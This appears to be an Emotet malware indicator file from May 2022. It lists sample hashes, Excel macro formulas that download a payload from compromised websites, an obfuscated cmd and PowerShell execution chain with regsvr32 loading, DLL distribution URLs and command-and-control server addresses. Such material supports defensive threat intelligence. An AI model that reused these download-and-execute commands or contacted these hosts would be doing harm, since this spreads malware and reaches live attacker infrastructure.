e4_emotet_18.05.2022.txt
Emotet 2022 | epoch4 | 18.05.2022 |
************************************************************************************************************
.xls 871c3a560fe16ebb0c953f84ff95e05eb7c5075b8356b09aa43bddeec9c21826
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://oftalmocity.com/wp-admin/xDjDiXhcS/", "..\hvxda.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "htttp://www.omarhospital.com/wp-content/Ved4BBJms7gwl2/", "..\hvxda.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://www.muslimproperty.co.uk/cgi-bin/8lS/", "..\hvxda.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://goodfriendsdriving.com/createschedule/F0jGvgTiFAMRh2Tr8HL/", "..\hvxda.ocx")
************************************************************************************************************
.zip 4a18d9c74c763d165d598ef0f2df9339009825edf54b2ef2f2d8bcba5cd33289
.lnk da9abd0dd8da13b96d51ff0612460e355863642bd5c953fe7aefece2bdc23b08
.dll 2adb0e66ffcb01ce3d105fa895a443199497e58b40ba4ed3cdd7fb5543c0130e
************************************************************************************************************
Exec >>
cmd /c "C:\Users\Admin\AppData\Local\Temp\Payment with a new address.lnk"
cmd.exe" /v:on /c pM7ToSJLO5PtMA5FrFkOLywy9TqiR91UcbFL8jp2dOhm1qrIUp8FDhMpkluiJJy0IIGY+X6F||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$kRMaFO='ICAgICAgICBXcml0ZS1Ib3N0ICJoWnBJZSI7JFByb2dyZXNzUH';$hLTAQy='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';$RY=[System.Convert]::FromBase64String($kRMaFO+$hLTAQy);$vZ=[System.Text.Encoding]::ASCII.GetString($RY); iex ($vZ)}"
powershell.exe -c "&{$kRMaFO='ICAgICAgICBXcml0ZS1Ib3N0ICJoWnBJZSI7JFByb2dyZXNzUH';$hLTAQy='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';$RY=[System.Convert]::FromBase64String($kRMaFO+$hLTAQy);$vZ=[System.Text.Encoding]::ASCII.GetString($RY); iex ($vZ)}"
regsvr32.exe C:\Users\Admin\AppData\Local\Temp\..\BEhFcGmnp\IfcziNlbBL.EnA
regsvr32.exe C:\Windows\system32\XzEnFJsk\NNZhBMftHKvliX.dll
************************************************************************************************************
.dll distribution URLs
http://yamada-shoshi.main.jp/yamada-shoshi/lg1/
http://msndesign.nl/libraries/c8NvFU14/
https://musculation-esisa.fr/css/iU2SYlfYxsk/
http://medreg.uz/Docs/1kj8refeLdotQee2f/
http://puntamimarlik.com.tr/wp-admin/9IW7L1gKwWOoNQREJ6/
http://wanderlustphtravel.com/cgi-bin/QphfoQq4t/
************************************************************************************************************
C2s
51.254.140.238:7080
103.70.28.102:8080
5.9.116.246:8080
1.234.2.232:8080
209.250.246.206:443
58.227.42.236:80
72.15.201.15:8080
159.65.88.10:8080
189.126.111.200:7080
173.212.193.249:8080
188.44.20.25:443
134.122.66.193:8080
172.104.251.154:8080
103.75.201.2:443
150.95.66.124:8080
153.126.146.25:7080
103.43.75.120:443
203.114.109.124:443
27.54.89.58:8080
1.234.21.73:7080
146.59.226.45:443
185.8.212.130:7080
159.65.140.115:443
167.172.253.162:8080
45.235.8.30:8080
213.241.20.155:443
163.44.196.120:8080
45.118.115.99:8080
102.222.215.74:443
209.126.98.206:8080
77.81.247.144:8080
46.55.222.11:443
110.232.117.186:8080
212.237.17.99:8080
45.176.232.124:443
183.111.227.137:8080
101.50.0.91:8080
173.239.37.178:8080
206.189.28.199:8080
103.132.242.26:8080
201.94.166.162:443
158.69.222.101:443
82.165.152.127:8080
164.68.99.3:8080
209.97.163.214:443
172.105.70.96:443
185.4.135.165:8080
212.24.98.99:8080
149.56.131.28:8080
129.232.188.93:443
131.100.24.231:80
197.242.150.244:8080
94.23.45.86:4143
79.137.35.198:8080
91.207.28.33:8080
167.99.115.35:8080
152.136.229.39:8080
51.91.76.89:8080
119.193.124.41:7080
89.29.244.7:443
151.106.112.196:8080
196.218.30.83:443
160.16.142.56:8080